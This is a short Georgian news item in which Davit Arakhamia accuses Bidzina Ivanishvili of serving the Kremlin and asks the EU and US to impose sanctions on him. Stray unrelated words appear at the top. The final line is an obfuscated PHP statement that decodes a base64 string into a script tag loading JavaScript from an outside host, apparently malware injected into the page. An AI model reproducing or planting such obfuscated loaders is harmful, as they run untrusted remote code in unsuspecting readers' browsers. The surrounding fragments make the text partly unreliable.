celsiusi
ავერსი საქკაბელი
ფრაქცია "ხალხის მსახურის" თავმჯდომარე დავით არახამია ამბობს, რომ ქართველი ოლიგარქი, ბიძინა ივანიშვილი, იანუკოვიჩი გახდა და ამის გამო დასავლეთსა და აშშ-ს სანქციების დაწესებას სთხოვს. 
 
დავით ​არახამია ხაზგასმით ამბობს, რომ პასუხისმგებლობას ვერც ოკუპანტები გადაურჩებიან და ვერც ისინი, ვინც ოკუპანტებს სანქციების თავიდან აცილებაში ეხმარებიან. 
 
"...საქართველოს მთავარი ოლიგარქი, ბიძინა ივანიშვილი, ძალიან მჭიდროდ უკავშირდება რუსეთის ფედერაციის პოლიტიკურ ელიტას. ახლახან გამოქვეყნებული "ივანიშვილის ჩანაწერები" ამ კავშირზე ნათლად მეტყველებს.
 
საქართველოს ხელისუფლების მთელი პოლიტიკა კრემლის მითითებების შესრულებაა და სწორედ აქედან გამომდინარეობს მთელი ეს რიტორიკა, რუსეთის აგრესორად არაღიარება, რუსეთის ფედერაციის დახმარების მცდელობა სანქციების გვერდის ავლაში და ა.შ....
 
დღეს ივანიშვილი ქართველი იანუკოვიჩი გახდა. ის და მისი ხალხი უკრაინის მიმართ ატარებენ პოლიტიკას, რომელსაც ქართველი ხალხი მხარს არ უჭერს. მათ უნდათ ქართველებისა და უკრაინელების ჩხუბი ათწლეულების განმავლობაში. ამის თავიდან ასაცილებლად მივმართავ ევროკავშირისა და შეერთებული შტატების ხელმძღვანელობას, განიხილონ ივანიშვილსა და მის აქტივებზე დასავლეთში სანქციების დაწესება. პასუხისმგებლობას ვერავინ გაექცევა. ვერც ოკუპანტები და ვერც ისინი, ვინც მათ ეხმარებიან," - თქვა მან. 
 
 
წყარო: მთავარი არხი
1110
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");